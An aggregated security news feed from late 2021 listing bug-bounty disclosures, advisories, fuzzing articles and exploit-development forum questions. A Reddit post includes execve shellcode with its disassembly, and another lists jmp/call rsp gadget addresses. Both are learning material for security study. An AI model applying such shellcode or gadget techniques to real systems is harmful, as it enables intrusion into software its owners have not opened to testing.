    Today we will understand how to Fuzz using Burp Suite. On Day 3, we had used dirbuster for the same purpose. Continue reading on Medium »  ( 2 min )

  • Open

    reflected xss on the path m.tiktok.com
    TikTok disclosed a bug submitted by semsem123: https://hackerone.com/reports/1394440 - Bounty: $1000
    IDOR the ability to view support tickets of any user on seller platform
    TikTok disclosed a bug submitted by lewaperbb: https://hackerone.com/reports/1392630 - Bounty: $2500
    [h1-2102] [Yaworski's Broskis] Suspected overcharge and chargebacks in PoS
    Shopify disclosed a bug submitted by c0rv4x: https://hackerone.com/reports/1089978 - Bounty: $500
    access to stack memory beyond array boundaries
    Open-Xchange disclosed a bug submitted by ihsinme: https://hackerone.com/reports/796555 - Bounty: $400
    File System Monitoring Queue Overflow
    ownCloud disclosed a bug submitted by ihsinme: https://hackerone.com/reports/881891
    Ability to add address without being an admin or staff in the store via wholesale store
    Shopify disclosed a bug submitted by hydraxanon82: https://hackerone.com/reports/1279322 - Bounty: $500
    Unathorised access to admin endpoint on plus-website-staging5.shopifycloud.com
    Shopify disclosed a bug submitted by j0j0: https://hackerone.com/reports/1394982 - Bounty: $2900
  • Open

    Dynamic instrumentation of a C binary
    I am (a Frida noob) trying to write a script for Frida to capture and modify variables inside a C function. The code for my binary looks like this: int myfunc(int dummy) { return --dummy; } int main () { ... printf("%d\n", myfunc(15)); return 0; } My javascript looks like this: var myfunc_ptr = Module.findExportByName(null, "myfunc") Interceptor.attach(myfunc_ptr, { onEnter: function(args) { const source_string = args[0].readUtf8String(); console.log(source_string); args[0].writeUtf8String("999"); }, onLeave: function(retval) { // by now do nothing. } }) But it fails to update the value. Any help is appreciated ! :) submitted by /u/www_devharsh_me [link] [comments]  ( 1 min )
  • Open

    PowerShell for Pentester: Windows Reverse Shell
    Today, we’ll explore how to acquire a reverse shell using Powershell scripts on the Windows platform. Table of Content Powercat Invoke-PowerShellTcp (Nishang) ConPtyShell Mini-reverse PowerShell The post PowerShell for Pentester: Windows Reverse Shell appeared first on Hacking Articles.  ( 7 min )
  • Open

    XMGoat - An Open Source Pentesting Tool for Azure - XM Cyber
    submitted by /u/dmchell [link] [comments]

  • Open

    Stored XSS in files.slack.com
    Slack disclosed a bug submitted by oskarsv: https://hackerone.com/reports/827606 - Bounty: $1000
    Bypassing HTML filter in "Packing Slip Template" Lead to SSRF to Internal Kubernetes Endpoints
    Shopify disclosed a bug submitted by cthulhufhtagn: https://hackerone.com/reports/1115139 - Bounty: $500
    CSS injection via link tag whitelisted-domain bypass - https://www.glassdoor.com
    Glassdoor disclosed a bug submitted by zonduu: https://hackerone.com/reports/1250730 - Bounty: $100
    account takeover through password reset in url https://reklama.tochka.com/
    QIWI disclosed a bug submitted by anonymouus: https://hackerone.com/reports/1379842 - Bounty: $500
  • Open

    The mystery of the missing Mac release
    Some eagle-eyed users of Burp Suite have noticed that there is no Mac release of Burp Suite 2021.10.2. Why is this release missing in action? Well, the true story is rather mundane, and unfortunate. F  ( 2 min )
  • Open

    December 2021 update for Netsparker Enterprise On-Premises
    This blog post announces the December 2021 update for Netsparker Enterprise On-Premises, highlighting tagging, a login warning banner, encryption, and the integrations with ServiceNow Vulnerability Management and DefectDojo. READ MORE  ( 2 min )
  • Open

    APT Expands Attack on ManageEngine With Active Campaign Against ServiceDesk Plus
    A persistent and determined APT actor has expanded beyond Zoho ManageEngine ADSelfService Plus and begun an active campaign against ServiceDesk Plus. The post APT Expands Attack on ManageEngine With Active Campaign Against ServiceDesk Plus appeared first on Unit42.

  • Open

    Injection is the New Black: Novel RTF Template Inject Technique Poised for Widespread Adoption Beyond APT Actors
    submitted by /u/dmchell [link] [comments]
    Tracking a P2P network related to TA505
    submitted by /u/dmchell [link] [comments]
  • Open

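    [Security Advisory] Multiple high-severity vulnerabilities in HP multifunction printers (CVE-2021-3923...
    Recently, details of multiple high-severity vulnerabilities in HP multifunction printers (CVE-2021-39237 & CVE-2021-39238) were made public; HP published a security bulletin on November 1. Attackers can exploit these vulnerabilities to obtain sensitive information, carry out remote...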
  • Open

    Faster Chrome - Let The Compiler do the work
    Chrome is fast, but there's always room for improvement. Often, that's achieved by carefully crafting the algorithms that make up Chrome. But there's a lot of Chrome, so why not let computers do at least some part of our work? In this installment of The Fast And the Curious, we'll show you several changes in how we build Chrome to achieve a 25.8% higher score on Speedometer on Windows and a 22.0% increase in browser responsiveness. Why speed? So why do we care about performance benchmarks? It's not a simple "higher numbers is better" chasing of achievements - performance was so important to Chrome that we embedded in our core principles, the "4Ss" - Speed, Security, Stability, Simplicity. And speed matters because we want a browser that responds quickly. Speed matters so much because we…
  • Open

    Is passing data to a driver a collection of loads/Mov instructions?
    submitted by /u/WillyRaezer [link] [comments]
    Android touch input spoofing?
    How could I spoof the input to the touch screen on any app using regular code and not already root? submitted by /u/WillyRaezer [link] [comments]
  • Open

    Play Your Cards Right: Detecting Wildcard DNS Abuse
    Wildcard DNS records can be used constructively, but their flexibility also provides attackers with a variety of options for executing attacks. The post Play Your Cards Right: Detecting Wildcard DNS Abuse appeared first on Unit42.
  • Open

    The SANS/CWE Top 25 dangerous software errors of 2021
    Since we last looked at it in 2019, the SANS/CWE Top 25 list has been updated twice. Let’s see what this year’s SANS Top 25 tells us about the state of software security in 2021 and how it relates to the latest OWASP Top 10. READ MORE  ( 6 min )
  • Open

    Privilege Escalation leads to trash other users comment without having admin rights.
    Basecamp disclosed a bug submitted by fuzzsqlb0f: https://hackerone.com/reports/1307943 - Bounty: $200
    Stored XSS on https://community.my.games/ (Add Post)
    Mail.ru disclosed a bug submitted by c1kada: https://hackerone.com/reports/755322
    Reflected XSS in photogallery component on [https://market.av.ru]
    Azbuka Vkusa disclosed a bug submitted by haxta4ok00: https://hackerone.com/reports/988271 - Bounty: $100
    .....
    VK.com disclosed a bug submitted by executor: https://hackerone.com/reports/505336 - Bounty: $200

  • Open

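    [Security Advisory] Weaver (泛微) E-Office file upload vulnerability (CNVD-2021-49104)
    Recently, in-the-wild exploitation of the Weaver (泛微) E-Office file upload vulnerability (CNVD-2021-49104) has been observed online; through this vulnerability an attacker can, on affected...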
  • Open

    Paid CTF partner
    Hi, Am doing a couple of CTFs next Sunday and Monday, and I have a shortage in Pwn and reverse fields. If you're interested in helping me through the CTF in these challenges and earning some quick money for each one you help solve, let me know or message me. Note : I can cover all other categories, and know the basics of pwn and reverse but I don't have a team that's why am asking for help. and as I know everyone is busy working or studying, I offered money for each challenge solved so it doesn't become waste of time for whoever wanna help. submitted by /u/riskyg33k [link] [comments]  ( 1 min )
  • Open

    AbuseHumanDB — HackTheBox Write-Up
    In the first post of this blog we are going to examine a Hack The Box challenge called “AbuseHumanDB” and how to carry out a Blind XS Leak + CORS… Continue reading on Medium »  ( 2 min )

  • Open

    Execve shellcode not working
    global _start start: ; =================== EXECVE ====================== ; https://chromium.googlesource.com/chromiumos/docs/+/master/constants/syscalls.md xor eax, eax mov al, 11 ; execve sys call no 11 xor edx, edx ; reverse the command string and store it /bin/bash/0 push edx ; push the null of the string push 0x686c6c61 ; this shit represent ls -allh in reverse and connverted to hex push 0x2d20736c mov ebx, esp ;sec arg to the execve is the pointer to the strin to execve mov ecx, edx ; mov 3rd arg to execve can be null int 0x80 ;================= EXIT PROGRAM ===================== ; exit = sys call no 1 -> must go to eax ; args to sys call is return code of the program -> must go to ebx ;xor eax, eax ; eax = 0 ;add eax, 1 ; eax = 1 ;xor ebx, ebx ; ebx = 0 ;add bl, 4 ;inc ebx ;int 0x80 see the push edx then next 2 instruction, its a command ls -allh command this command isnt executing, but /bin//sh is working with this. is their any problem with this. running program, sh is a program too its working but ls with args. ;;;;;; after compiling and dumping with objdump ;;;;;;;;; ld: warning: cannot find entry symbol _start; defaulting to 0000000008049000 f_output: file format elf32-i386 Disassembly of section .text: 08049000 : 8049000: 31 c0 xor eax,eax 8049002: b0 0b mov al,0xb 8049004: 31 d2 xor edx,edx 8049006: 52 push edx 8049007: 68 61 6c 6c 68 push 0x686c6c61 804900c: 68 6c 73 20 2d push 0x2d20736c 8049011: 89 e3 mov ebx,esp 8049013: 89 d1 mov ecx,edx 8049015: cd 80 int 0x80 ​ submitted by /u/dude_sourav [link] [comments]  ( 3 min )
  • Open

    Threat Hunting, IRL
    While I worked for one company, I did a lot of public speaking on the value of threat hunting. During these events, I met a lot of folks who were interested to learn what "threat hunting" was, and how it could be of value to them. I live in a very rural area, on just shy of 19 acres. One neighbor has 15 acres up front and another 20 in the back, and he adjoins a large property with just a trailer. My neighbor on the other side has 19 acres of...just 19 acres. We have animals, as well as more than a few visitors, which makes for a great analogy for threat hunting. Within the borders of my property, we have three horses and a mini-donkey, and we have different paddocks and fields for them. We can restrict them to certain areas, or allow them to roam freely. We do this at different times o…  ( 6 min )

  • Open

    New differential fuzzing tool reveals novel HTTP request smuggling techniques
    Article URL: https://portswigger.net/daily-swig/new-differential-fuzzing-tool-reveals-novel-http-request-smuggling-techniques Comments URL: https://news.ycombinator.com/item?id=29342944 Points: 169 # Comments: 33  ( 4 min )

  • Open

    Long names and muscle memory?
    Hi I have a general programming question, I have tendency to like short and sweet code, but many platforms/libraries have more obtuse names etc. Is it common to build muscle memory when typing out longer names etc.? I noticed Windows land code is pretty obtuse. submitted by /u/WillyRaezer [link] [comments]  ( 1 min )
  • Open

    Building a secure SDLC for web applications
    A predictable and efficient software development lifecycle (SDLC) is crucial for delivering modern web applications on schedule, in scope, and within budget. Building security into the application lifecycle is not an easy task, so let’s see how you can integrate application security best practices to create a secure software development life cycle. READ MORE  ( 6 min )
  • Open

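    [Translation] Some BPF datapath extensions introduced for K8s workloads (LPC, 2021)
    Translator's preface This article is a translation of a talk from LPC 2021: BPF datapath extensions for K8s workloads. The authors, Daniel Borkmann and Martynas Pumputis, are both core Cilium developers. Some background, code snippets and links were added during translation to aid understanding. The translation is published with the authors' permission. Given the translator's limited ability, omissions or errors are inevitable; if in doubt, please consult the original. The translation follows. Translator's preface 0 Introduction 0.1 Cilium datapath basics 0.2 Recent changes to the Cilium datapath 0.3 Outline 1 cgroup v1/v2 interference problem 1.1 Ordinary nodes: mounting v1 and v2 together is fine 1.2 Nested-virtualization nodes 1.2.1 KIND (K8s-In-Docker) 1.2.2 KIND-worker-node cgroup layout 1.2.3 Resulting problems 1.3 Problem analysis: legacy code assumes v1 and v2 are never enabled together 1.4 Solution: split the v1/v2 fields 2 TCP Pacing 2.0 Basics 2.0.1 TCP Pacing (sending data evenly within each RTT window) 2.0.2 TCP BBR algorithm 2.0.3 tc FQ (Fair Queue) 2.1 K8s pod rate limiting 2.2 Implementation of pod egress rate limiting in Cilium 2.3 Next steps: supporting TCP Pacing & BBR 2.3.1 Why it cannot be supported today: crossing netns resets the skb timestamp 2.3.2 Why skb->tstamp has to be reset when crossing netns 2.3.3 Can skb->tstamp be unified onto a single clock? 2.4 Mid-session Q&A Question 1: net_t…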

  • Open

    Tips for DFIR Analysts, pt. V
    Over the years, I've seen DFIR referred to in terms of special operations forces. I've seen incident response teams referred to as "Cyber SEALs", as well as via various other terms. However, when you really look at, incident response is much more akin to the US Army Special Forces, aka "Green Berets"; you have to "parachute in" to a foreign environment, and quickly develop a response capability making use of the customer's staff ("the natives"), all of whom live in a "foreign culture". As such, IR is less about "direct action" and "hostage rescue", and more about "foreign internal defense". Analysis occurs when an analyst applies their knowledge and experience to data, and is usually predicated by a parsing phase. We can learn a great deal about the analyst's level of knowledge and experie…  ( 7 min )
  • Open

    Fuzzing with Scapy: Introduction to Network Protocol Fuzzing (DNS & TCP packets)
    submitted by /u/pat_ventuzelo [link] [comments]

  • Open

    Observing Attacks Against Hundreds of Exposed Services in Public Clouds
    Insecurely exposed services are common misconfigurations in cloud environments. We used a honeypot infrastructure to learn about attacks against them. The post Observing Attacks Against Hundreds of Exposed Services in Public Clouds appeared first on Unit42.
  • Open

    Explaining Basic DOM Clobbering And The Tag
    Or if you’re stuck on PortSwigger’s DOM Clobbering labs Continue reading on Medium »
    Intigriti’s November XSS challenge By @IvarsVids
    This one is by far one of the hardest challenges that I’ve done. The solution is not as intended but it does include some pretty nice… Continue reading on Medium »  ( 5 min )
  • Open

    Source code audit or methodology to find potential Memory corruption in low level language in c/c++ and Assembly.
    Hi , I am beginner to Vulnerability research. Have some experience in ctf and exploit challenges. The problem that I am facing challenges while auditing code either in c/c++ or Assembly manually. I missed many points while searching potential candidates for memory corruption or other logical vulnerabilities. Let’s say I am analysing c++ developed binary in IDA . So I want to know some advice or any tutorials or books to achieve them . Also in windbg crash let’s say there is a crash happened. How to determine which classes of vulnerability it is. .please let me know guys . Thanks. submitted by /u/crypt3r [link] [comments]  ( 2 min )


  • Open

    A bit confused about the jmpcall function in PEDA w/ ASLR but no PIE (x64/Linux)
    Brushing up on some x64 exploitation, and going through some exercises, I am confused by this: When I find jmp esp in a non-PIE enabled binary (using gdb-peda), the location does not seem to change, and is only 3 bytes (with ASLR on). This works fine to execute my shellcode if I pad it out with nulls. What I am confused about is, why is it only 3 bytes? And why is it constant? Is ASLR only randomizing buffer space and not where the .code is loaded? Is an ASLR enabled binary in Windows then the equivalent of Linux ASLR + PIE? Are the 3 bytes just a relative offset? gdb-peda$ jmp esp 0x40061e : jmp rsp 0x400743 : call rsp 0x60061e : jmp rsp 0x600743 : call rsp submitted by /u/Bahariasaurus [link] [comments]  ( 2 min )
  • Open

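    [Security Advisory] Metabase sensitive information disclosure vulnerability (CVE-2021-41277)
    Recently, a sensitive information disclosure vulnerability was reported in Metabase, with a CVSS3 score as high as 9.9. An attacker can obtain sensitive system information without authentication.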

  • Open

    The secret to getting results, not noise, from your DAST solution
    Products for dynamic application security testing (DAST) vary widely in quality and capabilities. A low-quality tool that merely ticks a box will do little to improve security and may generate more work than it saves. But a mature, high-quality solution can bring measurable security improvements and serve as a solid foundation for your entire AppSec program, as our infographic shows. READ MORE  ( 3 min )
  • Open

    Exploiting Predictable PRNG Seeds (with PwnTools, incl binary patching)
    submitted by /u/_CryptoCat23 [link] [comments]
  • Open

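    [Translation] [Paper] Formal requirements for virtualizable third generation (computer) architectures (ACM, 1974)
    Translator's preface This article is a translation of the classic 1974 paper on virtualizable computer architectures (i.e. those able to support VMs): Popek, Gerald J., and Robert P. Goldberg. "Formal requirements for virtualizable third generation architectures." Communications of the ACM 17.7 (1974): 412-421. Although it is half a century old, some of the paper's core ideas are still not outdated. In particular, it describes at the most basic level how virtual machines work (just as (Translation) RFC 1180: A Plain TCP/IP Tutorial (1991) describes at the most basic level how TCP/IP works, although this paper is somewhat more obscure), and this material helps greatly in understanding the underlying principles of virtualization. For an introduction to the first through fourth generations of computer architecture, see Evolution of Computers from First Generation to Fourth Generation: First generation: 1940 – 1958 Second generation: 1958 – 1964 Third generation: 1964 ~ 1974, characteristics: integrated circuits replacing transistors, high-level programming languages, magnetic storage Fourth generation: 1974 ~ present Given the translator's limited ability, omissions or errors are inevitable; if in doubt, please consult the original. The translation follows. Translator's preface 1. Virtual Machine Concepts 1.1 Virtual machine (VM) and virtual machine monitor (VMM) 1.2 Characteristics of a VMM 1.2.1 Equivalence: a program running in a VM produces the same results as on the real machine 1.2.2 Efficiency: most VM instructions execute directly on the hardware 1.2.3 Complete control of system resources 1.3 Definition of a virtual machine (VM) 2. A Model of Third Generation M…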

  • Open

    Simplified Storage Controls
    Posted by Theodore Olsauskas-Warren At Chrome, we’re always looking for ways to help users better understand and manage privacy on the web. Our most recent change provides more clarity on controlling site storage settings. Starting today, we will be rolling out this change to M97 Beta, we will be re-configuring our Privacy and Security settings related to data a site can store (e.g. cookies). Users can now delete all data stored by an individual site by navigating to Settings > Privacy and Security > Site Settings > View permissions and data stored across files, where they’ll land on chrome://settings/content/all. We will be removing the more granular controls found when navigating to Settings > Privacy and Security > Cookies and other site data > See all cookies and site data at chrome:/…
    Chrome 97: WebTransport, New Array Static Methods and More
    Unless otherwise noted, changes described below apply to the newest Chrome beta channel release for Android, Chrome OS, Linux, macOS, and Windows. Learn more about the features listed here through the provided links. Chrome 97 is beta as of November 18, 2021. Preparing for a Three Digit Version Number Next year, Chrome will release version 100. This will add a digit to the version number reported in Chrome's user agent string. To help site owners test for the new string, Chrome 96 introduces a runtime flag that causes Chrome to return '100' in its user agent string. This new flag called chrome://flags/#force-major-version-to-100 is available from Chrome 96 onward. For more information, see Force Chrome major version to 100 in the User-Agent string. Features in this Release Auto-expand D…
  • Open

    security researcher assistant
    Hello folks, I am looking for an internship in exploitdev or vulnerability research. I am not looking for any revenue I just need a practical experience. Is there a way to find an internship in such a field as non-american? submitted by /u/botta633 [link] [comments]  ( 1 min )
    Is it still worth it to read The Shellcoder’s Handbook?
    I've been meaning to get into exploit dev and i know that The Shellcoder’s Handbook is recommended but does it still hold up in 2021? submitted by /u/milkshakemahn [link] [comments]  ( 1 min )

  • Open

    Threat actors offer millions for zero-days, developers talk of exploit-as-a-service
    submitted by /u/soupcreamychicken [link] [comments]
  • Open

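    [Security Advisory] Apache ShenYu Admin authentication bypass vulnerability (CVE-2...
    Recently, an authentication bypass vulnerability was reported in Apache ShenYu Admin; an attacker can use it to bypass JSON Web Token (JWT) authentication and directly access the system's admin backend.  ( 1 min )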
  • Open

    Burp Suite certification prices hacked for Black Friday
    For the very first time, we've decided to join the rest of the world and run a Black Friday offer. Between 16 November 2021 and 30 November 2021, you can buy our Burp Suite Certified Practitioner exam  ( 4 min )

  • Open

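    [Security Advisory] Hadoop Yarn RPC service unauthorized access vulnerability
    Recently, in-the-wild exploitation of an unauthorized access vulnerability in the Hadoop Yarn RPC service has been observed. Through this vulnerability, an unauthenticated attacker can execute arbitrary commands on affected hosts.  ( 1 min )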
  • Open

    How to generate millions of files using grammar-based fuzzing (FormatFuzzer)
    submitted by /u/pat_ventuzelo [link] [comments]
  • Open

    Partitioning Chrome's Code for Faster Launch Times on Android
    Mobile devices are generally more resource constrained than laptops or desktops. Optimizing Chrome’s resource usage is critical to give mobile users a faster Chrome experience. As we’ve added features to Chrome on Android, the amount of Java code packaged in the app has continued to grow. In this The Fast and the Curious post we show how our team improved the speed and memory usage of Chrome on Android with Isolated Splits. With these improvements, Chrome on Android now uses 5-7% less memory, and starts and loads pages even faster than before. The Problem For Android apps (including Chrome on Android), compiled Java code is stored in .dex files. The user's experience in Chrome on Android is particularly sensitive to increases in .dex size due to its multi-process architecture. On Android,…
  • Open

    Vulnerability scanning with PAM in zero trust environments
    Never trust, always check – that’s the zero trust motto. Enterprises and government agencies alike are rushing to implement at least some zero trust technologies, notably privileged access management (PAM), but this may have a knock-on effect on application security testing. Learn how modern AppSec solutions integrate with PAM platforms to ensure accurate testing even in locked-down environments. READ MORE  ( 4 min )

  • Open

    Show HN: OpenAPI fuzzer – fuzzing APIs based on OpenAPI specification
    Article URL: https://github.com/matusf/openapi-fuzzer Comments URL: https://news.ycombinator.com/item?id=29231804 Points: 76 # Comments: 22  ( 3 min )
  • Open

    Golden Certificate
    Domain persistence techniques enable red teams that have compromised the domain to operate with the highest level of privileges for a long period. One of… Continue reading → Golden Certificate  ( 5 min )

  • Open

    picoCTF - Here's a Libc Writeup
    submitted by /u/YioUio [link] [comments]

  • Open

    Breaking into exploit dev
    I am a security engineer looking to break into exploit dev. Background: I do not have a CS degree, although I went to school for CS. While in school I was captain of our collegiate hacking team. I held sessions where we practiced (beginner) buffer overflows. While in school I had done research on hardware reverse engineering, focused on medical devices. That got me to present with my peers at our local BSides. I then was able to present at IEEE SoutheastCon, which got me a job as a security engineer before graduating. 1) Is it possible to get into exploit dev without a degree or is it absolutely necessary? 2) Should I go the pentester route and then exploit dev? 3) Do you see security engineers break into this field or does it tend to be developers? I don't do any software engineering, but I do a lot of tooling in PowerShell, Python, and recently, Go. I know C but hardly. 4) Should I just shaddup and start learning? I'd assume that's get a better grip on primitives, ROP and C. submitted by /u/xnrkl [link] [comments]  ( 3 min )
    Binary Exploitation (Pwn) Challenge Walkthroughs - HackTheBox x Synack #RedTeamFive CTF
    submitted by /u/_CryptoCat23 [link] [comments]
  • Open

    Fuzzware: Using Precise MMIO Modeling for Effective Firmware Fuzzing – Usenix
    Article URL: https://www.usenix.org/conference/usenixsecurity22/presentation/scharnowski Comments URL: https://news.ycombinator.com/item?id=29198875 Points: 2 # Comments: 0  ( 2 min )

  • Open

    ClusterFuzzLite: Continuous Fuzzing for All
    Article URL: https://security.googleblog.com/2021/11/clusterfuzzlite-continuous-fuzzing-for.html Comments URL: https://news.ycombinator.com/item?id=29188664 Points: 15 # Comments: 3  ( 3 min )
  • Open

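    [Security Advisory] PAN GlobalProtect Portal memory corruption vulnerability (CVE-...
    Recently, Palo Alto Networks (PAN) published a security advisory fixing a memory corruption vulnerability in the Palo Alto Networks GlobalProtect portal and gateway interfaces. An unauthenticated attack...  ( 1 min )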

  • Open

    Asking Github Copilot to write Fuzzers & Hacking code for me - Hacking with AI
    submitted by /u/pat_ventuzelo [link] [comments]

  • Open

    Nyx-Net: Network Fuzzing with Incremental Snapshots
    Article URL: https://arxiv.org/abs/2111.03013 Comments URL: https://news.ycombinator.com/item?id=29116464 Points: 2 # Comments: 0  ( 2 min )

  • Open

    Chrome Dev Summit 2021: Moving toward a more powerful and private web
    By Paul Kinlan, Lead for Chrome Developer Relations The big day is finally here. Today, at Chrome Dev Summit 2021 we shared some of the highlights of what we've been working on — the latest product updates, vision for the web's future and examples of best-in-class web experiences. Over the past year, we've also had a lot of feedback that you want to spend more time learning from and working with the Chrome team and other industry experts. I'm excited to share with you that we've opened up a lot of spaces for 1:1 office hours, workshops and learning lounges to give you more opportunity to connect with the Chrome team. It's been a busy year for us all and with the continued shift of people moving more of their lives online, it has been more important than ever for us to continue investing …

  • Open

    Decrypt As If Your Security Depends on It
    Encryption has reached near-full adoption by internal teams hoping to implement stronger security and privacy practices. Simultaneously, attackers are using the same mechanisms to hide their malicious activity from the defender’s line of sight. According to the Ponemon Institute’s 2021 Global Encryption Trends Study, 50% of organizations have an encryption plan consistently applied across their […] The post Decrypt As If Your Security Depends on It appeared first on Security Weekly.  ( 2 min )
  • Open

    Run on OS Login
    Users want frequently used applications such as Email, Chat, and other productivity apps to automatically start when they log in to their devices. Auto-starting these apps at login streamlines the user experience as users don't have to manually start apps after logging into their devices. Windows, Mac, and Linux devices allow users to configure native apps to be launched automatically on startup. In Chrome 91, we introduced the Run on OS Login feature. With the launch of this feature, users can now configure desktop web apps to launch automatically when they log-in to the device on Windows, Mac, and Linux devices. Installed apps will not be permitted to automatically enable themselves to run when the user logs in. A manual user gesture will always be required. To configure apps to run on OS login, open Chrome browser. Navigate to chrome://apps or click the ‘Apps' icon in your bookmark bar (example below). To configure an app to start at login, first right click on it. From the context menu, select ‘Start app when you sign in' and you are all set. Next time when you log in to your device, the app will automatically launch on its own. To disable this feature for an app, navigate to chrome://apps. Right click on the app to bring up the context menu and deselect the option, ‘Start app when you sign in'. Apps launched through Run on OS Login are launched only after the device is running. ‘Run on OS Login' is a browser only feature and doesn't expose any launch source information to app developers. We're continuously improving the web platform to provide safe, low friction ways for users to get their day-to-day tasks done. Support for running installed web apps on OS login is a small but significant step to simplifying the startup routine for users that want apps like chat, email, or calendar clients to start as soon as they turn on their computer. As always, we're looking forward to your feedback. Your input will help us prioritize next steps! 
Posted by Pratyush Sinha

  • Open

    Searching, browsing, and shutdown Chrome performance improvements
    Chrome has long-term investments in performance improvement across many projects and we are pleased to share improvements across speed, memory, and unexpected hangs in today’s The Fast and the Curious series post. One in six searches is now as fast as a blink of an eye, Chrome OS browsing now uses up to 20% less memory thanks to our PartitionAlloc investment, and we’ve resolved some thorny Chrome OS and Windows shutdown experiences. Omnibox You’ve probably noticed that potential queries are suggested to you as you type when you’re searching the web using Chrome’s omnibox (as long as the “Autocomplete searches and URLs” feature is turned on in Chrome settings.) This makes searching for information faster and easier, as you don’t have to type in the entire search query -- once you’ve entered…
  • Open

    Tips for DFIR Analysts, pt IV
    Context is king, it makes all the difference. You may see something run in EDR telemetry, or in logs, but the context of when it ran in relation to other activities is often critical. Did it occur immediately following a system reboot or a user login? Does it occur repeatedly? Does it occur on other systems? Did it occur in rapid succession with other commands, indicating that perhaps it was scripted? The how and when of the context then leads to attribution. Andy Piazza brings the same thoughts to CTI in his article, "CTI is Better Served with Context". Automation can be a wonderful thing, if you use it, and use it to your advantage. The bad guys do it all the time. Automation means you don't have to remember steps (because you will forget), and it drives consistency and efficiency. Even …  ( 6 min )

  • Open

    Improvements to Burp Suite authenticated scanning
    Burp Suite's authenticated scanning feature enables users to scan privileged areas of target web applications even when a complex login sequence is required. This leverages Burp's browser - using the  ( 4 min )

  • Open

    Autofuzz – Fuzzing Java Without Writing Fuzz Targets
    Article URL: https://fuzz.ci/jazzer/update/2.0 Comments URL: https://news.ycombinator.com/item?id=29013958 Points: 3 # Comments: 1  ( 2 min )

  • Open

    DevSecOps Scanning Challenges & Tips
    There are many ways to do DevSecOps, and each organization — each security team, even — uses a different approach. Questions such as how many environments you have and the frequency of deployment of those environments are important in understanding how to integrate a security scanner into your DevSecOps machinery. The ultimate goal is speed […] The post DevSecOps Scanning Challenges & Tips appeared first on Security Weekly.  ( 2 min )

  • Open

    An Intro to Fuzzing (a.k.a. Fuzz Testing)
    Article URL: https://labs.bishopfox.com/tech-blog/an-intro-to-fuzzing-aka-fuzz-testing Comments URL: https://news.ycombinator.com/item?id=28988478 Points: 4 # Comments: 0  ( 14 min )

  • Open

    Security Fuzzing Podcast Episode
    Article URL: https://anchor.fm/firo-solutions/episodes/Fuzzing-with-Patrick-Ventuzelo-e197t6c Comments URL: https://news.ycombinator.com/item?id=28977322 Points: 4 # Comments: 0  ( 23 min )

  • Open

    Chrome 96 Beta: Conditional Focus, Priority Hints, and More
    Unless otherwise noted, changes described below apply to the newest Chrome beta channel release for Android, Chrome OS, Linux, macOS, and Windows. Learn more about the features listed here through the provided links or from the list on ChromeStatus.com. Chrome 96 is beta as of October 21, 2021. Preparing for a Three Digit Version Number Next year, Chrome will release version 100. This will add a digit to the version number reported in Chrome's user agent string. To help site owners test for the new string, Chrome 96 introduces a runtime flag that causes Chrome to return '100' in its user agent string. This new flag called chrome://flags/#force-major-version-to-100 is available from Chrome 96 onward. Origin Trials This version of Chrome introduces the origin trials described below. Origin…
    Sunsetting the "basic-card" payment method in the Payment Request API
    The Payment Request API is a soon-to-be-recommended web standard that aims to make building low-friction and secure payment flows easier for developers. The browser facilitates the flow between a merchant website and "payment handlers". A payment handler can be built-in to the browser, a native app installed on user’s mobile device, or a Progressive Web App. Today, developers can use the Payment Request API to access several payment methods, including “basic-card” and Google Pay in Chrome on most platforms, Apple Pay in Safari, Digital Goods API on Google Play, and Secure Payment Confirmation in Chrome. Earlier last year, we announced that we will deprecate the "basic-card" payment handler on iOS Chrome, followed by other platforms in the future. The "basic-card" is a payment method that is typically built into the browser to help users easily enter credit card numbers without remembering and typing them. This was designed to make a good transition from a form based credit card payment to an app based tokenized card payment. In order to better pursue the goal of app based payment (and a few other reasons), the Web Payments WG decided to remove it from the specification. Starting from version 96, Chrome will show a warning message in DevTools Console (together with creating a report to Reporting API) when the "basic-card" payment method is used. In version 100, the "basic-card" payment method will be no longer available and canMakePayment() will return false unless other capable payment methods are specified. This applies to all platforms including Android, macOS, Windows, Linux, and Chrome OS. If you are using the Payment Request API with the "basic-card" payment handler, we suggest removing it as soon as possible and using an alternative payment method such as Google Pay or Samsung Pay. Posted by Eiji Kitamura, Developer Advocate on the Chrome team
  • Open

    Get Burp Suite certified for free...
    Ready for the challenge? Buy your certification exam now... Burp Suite Certified Practitioner accreditation to enable our users to validate their self-taught skills as web security prac  ( 3 min )
  • Open

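    [Translation] How NAT Traversal Works: Technical Principles and Enterprise-Grade Practice (Tailscale, 2020)
    Translator's preface This article is translated from a 2020 English blog post: How NAT traversal works. Consider the following problem: there is one machine on a local network in Beijing and another in Shanghai (for example, one is a desktop at home and the other is a laptop connected to Starbucks WiFi). Both have private IP addresses but can reach the public internet. How can these two machines communicate with each other? Since both can reach the public internet, the simplest approach is of course to set up a relay server on the public internet: each machine connects to the relay service, which forwards traffic in both directions. This approach obviously carries a large performance overhead, and the relay server easily becomes a bottleneck. Is there a way for the two machines to communicate directly, without a relay? With some background in networking and protocols, you will see that this is possible. This epic-length article from Tailscale demonstrates that "possibility" step by step, from the basics onward; if you fully implement the techniques it describes, you will have an enterprise-grade NAT/firewall traversal tool. In addition, as the author says, many interesting ideas in decentralized software, once simplified, come down to the problem of establishing direct end-to-end connections across the public internet, so the significance of this article is not limited to NAT traversal itself. Because of the translator's limited ability, this article inevitably contains omissions or errors. If in doubt, please consult the original. The translation follows. Translator's preface 1 Introduction 1.1 Background: IPv4 address shortage and the introduction of NAT 1.2 Requirement: establishing a peer-to-peer connection between two machines behind NAT 1.3 Solution: NAT traversal 1.3.1 Two prerequisites: UDP + direct control of the socket 1.3.2 Fallback: relaying 1.4 Challenge: stateful firewalls and NAT devices 2 Traversing firewalls 2.1 Stateful firewalls 2.1.1 Default behavior (policy) 2.1.2 How to distinguish inbound and outbound packets 2.2 Firewall face-off and traversal schemes 2.2.1 Firewalls facing the same direction Scenario characteristics: the server IP is directly reachable Traversal scheme: the client connects directly to the server, or hub-and-s…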

  • Open

    Lateral Movement – WebClient
    Coercing elevated accounts such as machine accounts to authenticate to a host under the control of an attacker can provide an opportunity for privilege escalation… Continue reading → Lateral Movement – WebClient  ( 5 min )

  • Open

    Fuzzing-101: learn how to fuzz like a real expert
    Article URL: https://github.com/antonio-morales/Fuzzing101 Comments URL: https://news.ycombinator.com/item?id=28923466 Points: 4 # Comments: 0  ( 3 min )
    The Challenges of Fuzzing 5G Protocols
    Article URL: https://research.nccgroup.com/2021/10/11/the-challenges-of-fuzzing-5g-protocols/ Comments URL: https://news.ycombinator.com/item?id=28917943 Points: 5 # Comments: 0  ( 11 min )
